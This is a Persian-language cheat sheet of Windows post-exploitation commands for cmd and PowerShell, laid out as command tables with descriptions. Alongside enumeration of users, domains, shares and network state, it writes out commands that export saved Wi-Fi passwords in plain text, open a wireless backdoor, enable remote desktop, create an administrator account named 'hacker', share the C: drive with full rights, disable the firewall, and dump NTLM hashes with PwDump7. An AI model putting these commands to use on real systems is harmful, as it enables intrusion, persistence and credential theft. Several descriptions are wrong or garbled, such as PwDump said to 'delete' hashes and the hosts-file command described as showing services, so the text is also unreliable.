Exploitation یا بهره برداری یک برنامه یا اسکریپت برنامه ریزی شده است که می تواند هکرها را قادر به کنترل یک سیستم و بهره برداری از آسیب پذیری های آن کند. Windows Post Exploitation تکنیکی برای پیاده سازی اهداف مخرب یک هکر بر روی سیستم عامل ویندوزی قربانی میباشد. هکر با استفاده از این تکنیک میتواند فرایندهای زیر را انجام دهد:
استفاده از این نوع تکنیک به دو صورت انجام میشود که اولی با استفاده از فریم ورک تست نفوذ متاسپلویت است که ماژولی مخصوص این کار دارد و قابل توسعه نیز میباشد. دومی نیز با استفاده از خط فرمان سیستم عامل انجام میگیرد. Post Exploitation در زمینه تست نفوذ (pentesting) و برنامه نویسی بدافزار (malware programing) به کار می رود.
در ادامه به بررسی برخی از دستورات مهم Windows Post Exploitation می پردازیم که در محیط cmd و پاورشل قابل اجرا میباشند. این دستورات به صورت زیر میباشند:
دستورات | توضیحات |
tree C:\ /f /a > C:\output_of_tree.txt | یک لیست دایرکتوری را در قالب “درخت” چاپ می کند. آرگومان a باعث می شود که درختان با استفاده از نویسه های ASCII به جای موارد خاص چاپ شوند و آرگومان f نام فایل ها و همچنین پوشه ها را نشان می دهد. |
dir /a | تمام پرونده ها را در یک دایرکتوری فهرست می کند که شامل فایل های پنهان و سیستمی نیز میشود. |
dir /b /s [Directory or Filename] | شامل فهرست پرونده ها و دایرکتوری ها میباشد. |
dir \ /s /b | find /I “searchstring” | |
command | find /c /v “” | شمارش تمام خطوطی که برای “فرمان” استفاده می کنید. |
دستورات | توضیحات |
whoami | کاربر فعلی سیستم را نمایش میدهد. |
whoami /all | کاربر فعلی را به همراه گروه و سطح دسترسی نشان میدهد. |
set | متغییر های محیطی را نشان میدهد. مانند: USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE. |
fsutil fsinfo drives | درایو های فعلی سیستم را نشان میدهد. نیاز به دسترسی ادمین دارد. |
reg query HKLM /s /d /f “C:\* *.exe” | find /I “C:\” | find /V “””” | کوئری های ایمن ثبت شده در رجیستری سیستم عامل ویندوز 7 را نشان میدهد. |
دستورات | توضیحات |
ipconfig /all | اطلاعات کامل درباره NIC شما را نمایش می دهد. |
ipconfig /displaydns | کش DNS محلی شما را نمایش می دهد. |
netstat -nabo | لیست پورت ها / اتصالات با فرآیند متناظر (-b)، انجام ندادن (-n)، تمام اتصالات (-a) و مالکیت شناسه پردازش (-o) |
netstat -r | جدول مسیریابی را نمایش می دهد. |
netstat -na | findstr :445 | همه پورت ها و اتصالات مربوط به پورت 445 را پیدا کنید. |
netstat -nao | findstr LISTENING | پیدا کردن تمام پورت های LISTENING و PID مربوط به آنها. |
netstat -anob | findstr “services, process or port” | پرچم “b” فرمان را طولانی تر می کند اما نام پروسه را با استفاده از هر یک از اتصالات نمایش می دهد. |
netsh diag show all | {XP only} اطلاعات مربوط به سرویس های شبکه و آداپتورها را نشان می دهد |
net view | پرس و جو های (NBNS / SMB SAMBA) و تلاش برای پیدا کردن همه میزبان در گروه کاری یا دامنه فعلی شما. |
net view /domain | لیست تمام دامنه های موجود میزبان |
net view /domain:otherdomain | پرس و جوهای NBNS / SMB) SAMBA) و تلاش برای پیدا کردن همه میزبان در ‘otherdomain’ |
net user %USERNAME% /domain | اطلاعاتی راجع به کاربر فعلی را نشان میدهد که جزو یک کاربر دامنه هستند. اگر شما یک کاربر محلی هستید پس شما فقط دامنه را رها می کنید. مهمترین چیزهایی که باید توجه داشته باشید عبارتند از زمان ورود، آخرین بار تغییر رمز عبور، اسکریپت های ورود به سیستم و عضویت در گروه. |
net user /domain | همه کاربران دامنه را لیست می کند. |
net accounts | سیاست رمز عبور برای سیستم محلی را چاپ می کند. |
net accounts /domain | سیاست رمز عبور برای دامنه را چاپ می کند. |
net localgroup administrators | اعضای گروه محلی Administrators را چاپ می کند. |
net localgroup administrators /domain | برای استفاده از گروه و دامنه محلی فرض شده است. |
net group “Domain Admins” /domain | اعضای گروه مدیران دامنه را چاپ می کند. |
net group “Enterprise Admins” /domain | اعضای گروه مدیران اداری را چاپ می کند. |
net group “Domain Controllers” /domain | لیست کنترل کننده ها را برای دامنه فعلی چاپ می کند. |
net share | smb به اشتراک گذاشته شده شما را نمایش می دهد و مسیر (ها) آنها را نشان می دهد. |
net session | find / “\\” | |
arp -a | لیست تمام سیستم های موجود در جدول ARP دستگاه را نشان می دهد. |
route print | جدول مسیریابی ماشین را چاپ می کند. این می تواند برای پیدا کردن شبکه های دیگر و مسیرهای استاتیک که در آن قرار داده شده است مفید باشد. |
browstat (Not working on XP) | |
netsh wlan show profiles | تمام پروفایل های بی سیم ذخیره شده را نشان می دهد. بعدا می توانید اطلاعات مربوط به این پروفایل را با دستور زیر وارد کنید. |
netsh wlan export profile folder=. key=clear | یک پروفایل کاربری wifi را با رمز عبور در متن ساده به یک فایل xml در دایرکتوری کاری فعلی صادر می کند. |
netsh wlan [start|stop] hostednetwork | یک هات اسپات را استارت یا استاپ میکند. |
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary | تنظیم کامل شبکه میزبان برای ایجاد یک Backdoor بی سیم. |
netsh wlan set hostednetwork mode=[allow|disallow] | سرویس شبکه میزبان را فعال یا غیرفعال می کند. |
wmic ntdomain list | اطلاعات مربوط به دامنه و کنترل کننده دامنه را بازیابی کنید. |
دستورات | توضیحات |
gpresult /z | خروجی متشکل از GPO) Group policy) و تنظیمات مربوط به سیستم فعلی و کاربر را نشان میدهد. |
sc qc <servicename> | تنظیمات سرویس را بررسی می کند. |
sc query | به تنهایی مورد استفاده قرار می گیرد و تمام سرویس ها نمایش داده می شوند. |
sc queryex | اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد. |
type %WINDIR%\System32\drivers\etc\hosts | اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد. |
echo %COMSPEC% | معمولا در cmd.exe در دایرکتوری ویندوز قرار می گیرند، اما خوب است که مطمئن شوید. |
c:\windows\system32\gathernetworkinfo.vbs | ثبت نام رجیستری، پیکربندی فایروال، کش DNS، اسکریپت و غیره را داخل ویندوز۷ نشان میدهد. |
دستورات | توضیحات |
net share \\computername | |
tasklist /V /S computername | |
qwinsta /SERVER:computername | |
qprocess /SERVER:computername * | |
net use \\computername | به شما اجازه می دهد تا به سیستم دوردست به عنوان کاربر فعلی دسترسی پیدا کنید |
net use \\computername /user:DOMAIN\username password | با استفاده از IPC $ mount، یک نام کاربری و رمز عبور به شما اجازه می دهد تا به دستورات دسترسی پیدا کنید که معمولا از نام کاربری و رمز عبور به عنوان کاربر دیگری در زمینه سیستم از راه دور درخواست نمی کنند. |
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f | فعال کردن سرویس دسترسی از راه دور. |
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
| کمک از راه دور را فعال کنید. |
دستورات | توضیحات |
net user hacker hacker /add | یک کاربر جدید محلی با نام هکر و پسورد “هکر” ایجاد میکند. |
net localgroup administrators /add hacker or net localgroup administrators hacker /add | کاربر “هکر” جدید را به گروه مدیران محلی اضافه می کند. |
net share nothing$=C:\ /grant:hacker,FULL /unlimited | درایو C (یا هر درایو دیگر) به عنوان سهم ویندوز به اشتراک میگذارد. و حقوق کامل کاربر هکر را برای دسترسی یا تغییر هر چیزی در آن درایو به شما ارائه می دهد. |
net user username /active:yes /domain | یک حساب کاربری غیر فعال / غیر فعال را فعال می کند. |
netsh firewall set opmode disable | فایروال ویندوز را غیرفعال می کند. |
netsh firewall set opmode enable | فایروال ویندوز را فعال می کند. |
دستورات | برنامه های مرتبط | توضیحات |
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump | http://h.ackack.net/carrot-exe.html | بازگرداندن تنظیمات متداول فایروال setupnetsh opmode را غیر فعال می کند. |
PwDump7.exe > ntlm.txt | http://www.tarasco.org/security/pwdump_7/ | هش های ویندوز NTLM را پاک می کند. |